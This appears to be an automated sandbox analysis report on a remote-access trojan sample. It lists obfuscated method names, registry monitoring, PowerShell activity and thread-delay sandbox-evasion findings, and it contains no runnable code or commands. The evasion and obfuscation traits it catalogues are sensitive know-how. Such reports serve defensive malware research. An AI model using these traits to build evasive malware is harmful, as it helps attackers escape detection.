            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, bbPsGWxoYJLfpZBGIC.cs | High entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, YGEM2bi6LyVcTr1Cyx.cs | High entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Se7yaxeobBMdUHx8Vi.cs | High entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, kdj6WvMI01nxVHVla4.cs | High entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, zXnonSyflm4XEq4w2O.cs | High entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, EH2RCFfeaNraoXmPh4.cs | High entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, SWsSDUtWUdrnebBMgx.cs | High entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, VAFL6yzLyY66jhx7II.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, GCbAElUGA7WyejW7Zv.cs | High entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, KsKTQfhbw7oCRIK4yb.cs | High entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, OrhtwbropZ5iQ0Knjf.cs | High entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Ak4oG7NYOwJL1B3Iuo.cs | High entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Pwpj4xKLD3kV8kZye0j.cs | High entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, QQKot902G4vU2soPiv.cs | High entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, fVqBTE5GN24nXcJ2Na.cs | High entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.cs | High entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, LKGBl8HqPCBQXSKmTW.cs | High entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Q534henmWuNmoyahwo.cs | High entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, bbPsGWxoYJLfpZBGIC.cs | High entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, YGEM2bi6LyVcTr1Cyx.cs | High entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Se7yaxeobBMdUHx8Vi.cs | High entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, kdj6WvMI01nxVHVla4.cs | High entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, zXnonSyflm4XEq4w2O.cs | High entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, EH2RCFfeaNraoXmPh4.cs | High entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, SWsSDUtWUdrnebBMgx.cs | High entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, VAFL6yzLyY66jhx7II.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, GCbAElUGA7WyejW7Zv.cs | High entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, KsKTQfhbw7oCRIK4yb.cs | High entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, OrhtwbropZ5iQ0Knjf.cs | High entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Ak4oG7NYOwJL1B3Iuo.csHigh entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Pwpj4xKLD3kV8kZye0j.csHigh entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, QQKot902G4vU2soPiv.csHigh entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, fVqBTE5GN24nXcJ2Na.csHigh entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csHigh entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, LKGBl8HqPCBQXSKmTW.csHigh entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Q534henmWuNmoyahwo.csHigh entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, bbPsGWxoYJLfpZBGIC.csHigh entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, YGEM2bi6LyVcTr1Cyx.csHigh entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Se7yaxeobBMdUHx8Vi.csHigh entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, kdj6WvMI01nxVHVla4.csHigh entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, zXnonSyflm4XEq4w2O.csHigh entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, EH2RCFfeaNraoXmPh4.csHigh entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, SWsSDUtWUdrnebBMgx.csHigh entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, VAFL6yzLyY66jhx7II.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, GCbAElUGA7WyejW7Zv.csHigh entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, KsKTQfhbw7oCRIK4yb.csHigh entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, OrhtwbropZ5iQ0Knjf.csHigh entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 870000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 26A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: C20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 84A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 94A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 9690000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: A690000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: FA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 29C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: 49C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599657
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599532
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599422
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598938
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598813
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598704
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598579
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598454
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598336
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598219
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 598094
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596993
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596875
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596766
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596641
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596532
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596407
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596297
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596188
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 596063
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595938
